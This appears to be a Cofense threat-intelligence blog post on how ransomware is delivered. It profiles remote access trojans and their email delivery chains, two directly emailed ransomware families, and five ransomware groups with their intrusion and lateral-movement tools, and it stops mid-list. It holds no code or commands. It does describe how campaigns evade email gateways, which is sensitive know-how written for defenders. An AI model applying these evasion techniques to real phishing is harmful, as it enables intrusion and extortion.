By Max Gannon, Cofense Phishing Defense Center
Ransomware has been a threat for some time and has frequently been featured in the news. Even Ransomware incidents that cost companies relatively little compared to Business Email Compromise incidents still get the front page. That is because the actual impact of a Ransomware incident, including lack of availability of services, plummeting stock prices, and potential fines make them a far scarier prospect for many businesses. Here we are going to cover some of the top ways that Ransomware can be delivered, along with the Ransomware groups that Cofense has seen directly delivered in emails. The top malware that can be used to deliver Ransomware was drawn from the top malware seen in Secure Email Gateway (SEG) protected environments as these are the only ones likely to deliver Ransomware to customers.
Top 5 Malware Delivering Ransomware
Remote Access Trojans (RATs) are some of the most generalized malware in terms of capabilities. They are typically capable of doing basic keylogging, information stealing, loading additional malware, and the basics of what most other malware types can do. Although they are not consistently the top malware type that Cofense sees, this is likely because they often require more effort to set up and maintain than simple information stealers or keyloggers. RATs are also often in a grey area as they are frequently marketed as legitimate Remote Access Tools and sometimes even see use by legitimate companies, however, they are so frequently abused by threat actors that they are typically referred to as Remote Access Trojans despite marketing claims to the contrary.
DarkGate RAT
In 2024 DarkGate RAT was most often seen by Cofense being delivered by an attached Office document that has a link to download a script which in turn delivers the DarkGate RAT binary. It has also been seen being delivered directly in tax-themed emails and via various other infection chains involving URL shortcut files. Its novel use of Office documents with specially modified embedded URLs has allowed these campaigns to bypass many Secure Email Gateways (SEGs). DarkGate RAT is a Malware-as-a-Service (MaaS) that is capable of the typical RAT functions as well as cryptocurrency mining, focused credential theft, loader capabilities, and advanced anti-analysis behavior. The various capabilities come in the form of plugins that are installed after the RAT has established persistence.
According to the NJCCIC (New Jersey Cybersecurity & Communications Integration Cell), DarkGate RAT has been used by the Ransomware groups BianLian and BlackBasta to deliver Ransomware. DarkGate RAT also technically has the option to do rudimentary encryption and ransom operations on its own, although this feature is rarely used.
Figure 1: Method Used to Deliver DarkGate RAT in 2024
Remcos RAT
Remcos RAT is most often seen in SEG-protected environments when it is delivered via an embedded link to a legitimate file-sharing site that downloads a password-protected archive. The use of legitimate file-sharing sites such as Google Drive allows these emails to bypass some SEGs while the use of password-protected archives allows them to bypass even SEGs that scan embedded URLs and attempt to download linked files. Remcos RAT has the usual RAT capabilities including running keyloggers, taking screenshots, exfiltrating files, and uploading additional malware. It is notable that despite lacking advanced anti-analysis or anti-sandbox features, this RAT remains popular due to both its ease of use and the number of free versions available online.
Remcos RAT has no historical links to Ransomware delivery and has not been specifically called out in any major incidents. However, enterprises often don’t report on what malware delivered the Ransomware, only what the Ransomware was and if it started from an email or a direct hacking attack.
Figure 2: Method Used to Deliver Remcos RAT in 2024
Async RAT
When seen in SEG-protected environments, Async RAT is typically delivered via a script that is downloaded via a URL either directly embedded in the email or in an attached PDF. Async RAT is also typically seen being delivered in batches with other RATs and stealers such as XWorm RAT, Venom RAT, and Vjw0rm. Async RAT is an open-source RAT available on GitHub with various plugins such as keylogging, credential theft, and additional malware loading. Like Remcos RAT, it lacks any advanced anti-analysis or anti-sandbox features found in subscription-based RATs like DarkGate. Again, like Remcos RAT, Async RAT is still widely used because it is freely available online and is simple enough that threat actors do not need to be experienced to use it.
Async RAT is easily capable of uploading additional malware, including Ransomware, to infected computers. SentinelLabs links the threat actor group NullBuldge with the usage of Async RAT to deploy LockBit Ransomware.
Figure 3: Method Used to Deliver Async RAT in 2024
XWorm RAT
XWorm RAT is seen in SEG protected environments being delivered by either attached scripts or URL shortcut files downloaded via embedded links. Like Async RAT, it is often seen being delivered in batches of other RATs and stealers such as Venom RAT, Anarchy RAT, Silver RAT, XRed Backdoor, and Waltuhium Grabber. XWorm RAT is more advanced than Async RAT or Remcos RAT. It is MaaS like DarkGate RAT which has tiered functionality based on the subscription rate. Higher tiers enable the RAT to perform standard RAT actions as well as perform DDoS, spread via USB, replace cryptocurrency addresses in clipboards with the threat actors own, act as basic Ransomware, upload additional files, and preform HVNC. It also has more advanced anti-analysis or anti-sandbox features built in.
XWorm RAT is easily capable of uploading additional malware, including Ransomware, to infected computers. SentinelLabs links the threat actor group NullBuldge with the usage of XWorm RAT to deploy LockBit Ransomware.
Figure 4: Method Used to Deliver XWorm RAT in 2024
ConnectWise RAT
In 2024, when ConnectWise RAT is seen being delivered in SEG-protected environments it is most often delivered via a URL embedded in the email body or a URL embedded in an attached PDF file. The URL eventually redirects to the ConnectWise RAT executable that is directly hosted on ScreenConnect infrastructure.
ConnectWise RAT has a large array of capabilities but is most notable for being able to use PowerShell commands which threat actors often exploit to perform reconnaissance or load additional malware. ConnectWise RAT is the most legitimate of the RATs gathered here with a large number of legitimate customers using it as part of their IT infrastructure. Ironically it also has the most confirmed instances of it being abused to spread Ransomware. According to Morphisec, ConnectWise RAT was used to deliver VegaLocker Ransomware in December of 2019. Health Sector Cybersecurity Coordination Center (HC3) reported on an instance of Sodinokibi Ransomware being spread laterally via ConnectWise RAT in September of 2019. In 2020 Tetra Defense reported on the APT group GOLD SOUTHFIELD using ConnectWise RAT to deploy REvil. Although threat actors are no longer easily exploiting it to spread laterally, they have recently begun exploiting CVEs in ConnectWise RAT to spread Ransomware such as LockBit with groups including Black Basta actively exploiting the vulnerabilities.
Figure 5: Method Used to Deliver ConnectWise RAT in 2024
Directly Delivered Ransomware
Ransomware is most often delivered through the use of Initial Access Brokers (IABs). Threat actors will install a RAT or some form of malware capable of downloading additional malware and then sell access of the infected computers. Ransomware groups will then buy access to specific infected machines based on the size of the company whose network has been compromised. The Ransomware group will then spread laterally on the infected network and deploy Ransomware to all discovered machines and drives. Some of the more advanced Ransomware groups will identify and manually target enterprises deemed to be most profitable, using various methods to gain access to the company’s infrastructure. These types of events are commonly seen and typically front-page news. However, Ransomware events that most companies are likely to face originate with IABs. Here we have two exceptions seen this year by Cofense when Ransomware was directly delivered via email, in one case bypassing a SEG.
Amarok Locker Ransomware
Amarok Locker is known for targeting non-English speakers. In its first notable campaign in February 2024, it targeted Italian language speakers and its next notable campaign that Cofense saw in July 2024 targeted Dutch language speakers. Amarok Locker exfiltrates a large number of files before encrypting infected computers. The threat actors demand payment to both retrieve encrypted files and prevent files from being leaked online. An email address and a Keybase address are provided to negotiate the ransom.
The Amarok Locker Ransomware that Cofense analyzed in 2024 bypassed Mimecast SEG to deliver an embedded Google Drive URL. The file hosted on Google Drive was too big for Google to scan, thereby bypassing some of Google’s protections. When the archive was downloaded it contained a 102 MB executable.
LockBit Ransomware
LockBit is both a Ransomware family and a Ransomware group. It is important to note, however, that the group is known as LockBit 3.0 whereas the Ransomware family can be free versions of 2.0 or even 1.0. In fact, the LockBit Ransomware seen by Cofense in 2024 was likely a free edition of earlier versions as it exhibited none of the advanced Tactics Techniques, and Procedures (TTPs) seen by the LockBit 3.0 Ransomware group. It was sent in .zip archives directly attached to emails which makes it unlikely to have bypassed any SEGs and shown up in enterprise environments.
Top 5 Ransomware Groups Delivering Ransomware
Ransomware groups are organized, affiliated, threat actors who either directly attack victims and install Ransomware, offer their software services as an RaaS group, or sometimes both. According to the HC3, the following are the top 5 Ransomware groups seen in the last 6 months.
LockBit 3.0
The LockBit 3.0 RaaS group is the most active RaaS group targeting the U.S. Healthcare and Public Health Sector according to HC3. LockBit 3.0 utilizes several approaches to get their Ransomware on infected computers. These include direct attacks, phishing campaigns, and the use of IABs. LockBit 3.0 offers extensive customization, including the use of modules, which can make analysis and detection difficult. Once in place, LockBit 3.0 uses several methods to spread laterally including PsExec, Group Policy Objects, SMB, and compromised credentials.
BlackCat
BlackCat, or ALPHV, is a Ransomware group that operates as a RaaS. It is known for being the first to use Rust for its Ransomware which allows easier cross-platform operations and enables bypassing security controls that are not designed for that specific language. The group typically uses compromised credentials or Microsoft Exchange vulnerabilities to gain access. Once in place, BlackCat uses several methods to spread laterally and gather information including Group Policy Objects, AdFind, ADRecon, SoftPerfect, and compromised credentials
BianLian
BianLian (变脸), is a Chinese Ransomware group that started as a mobile banking trojan but quickly evolved its TTPs and shifted to multi-stage attacks with its first Ransomware being deployed in July 2022. Their Ransomware is modular, downloading additional plugins once in place. The group typically uses RDP credentials from IABs or phishing emails with attached malware or embedded links to download malware as their primary access method. Once in place, BianLian typically installs remote management software such as TeamViewer, SplashTop, or AnyDesk to ensure persistence. To discover the environment and spread laterally BianLian uses tools such as SoftPerfect, SharpShares, PingCastle, PsExec, and Impacket.
Akira
Akira is both a Ransomware group and a Ransomware-as-a-service (RaaS) group. Their most recent Ransomware strain is written in Rust, but they have used C++ in the past. They are known for conducting double extortion, charging both to decrypted data and to prevent leakage of stolen data. The group typically uses compromised credentials from an IAB to gain a foothold. Once in place, Akira typically uses tools such as Mimikatz and LaZagne to aid in privilege escalation. To discover the environment and spread laterally Akira uses tools such as AdFind, SoftPerfect, AnyDesk, and Ngrok. Akira uses tools such as RClone, FileZilla, and WinSCP to exfiltrate stolen information.
BlackSuit
BlackSuit is similar in many ways to Royal Ransomware which was a direct successor of the Conti operation. BlackSuit is also known for conducting double extortion, charging both to decrypted data and to prevent leakage of stolen data. Due to the overlap between BlackSuit and Royal Ransomware, it is difficult to distinguish exactly which characteristics belong only to BlackSuit. A CISA advisory notes that, once in place, BlackSuit and Royal Ransomware are both known for using the following tools to gather information and spread laterally: Cobalt Strike beacons, MobaXterm,